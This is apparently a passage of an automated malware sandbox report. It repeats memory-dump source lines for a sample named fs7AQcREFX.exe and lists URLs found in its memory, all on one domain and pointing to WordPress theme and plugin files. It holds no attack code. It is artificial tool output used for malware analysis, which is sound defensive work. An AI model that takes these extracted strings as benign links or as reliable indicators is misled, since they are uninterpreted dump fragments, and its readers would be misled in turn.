                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/page/4
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.5.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/bootstrap.css?ver=6.0.5
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/default.css?ver=6.0.5
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/fontawesome-all.css?ver=6.0.5
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/responsive.css?ver=6.0.5
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/bootstrap.js?ver=6.0.5
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/jquery.superfish.js?ver=6.0.5
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/theme.js?ver=6.0.5
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/style.css?ver=6.0.5
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403654124.0000000006E90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.406886203.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2020/06/primo-accedant-226x300.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.443831689.00000000031E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2020/06/primo-accedant.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 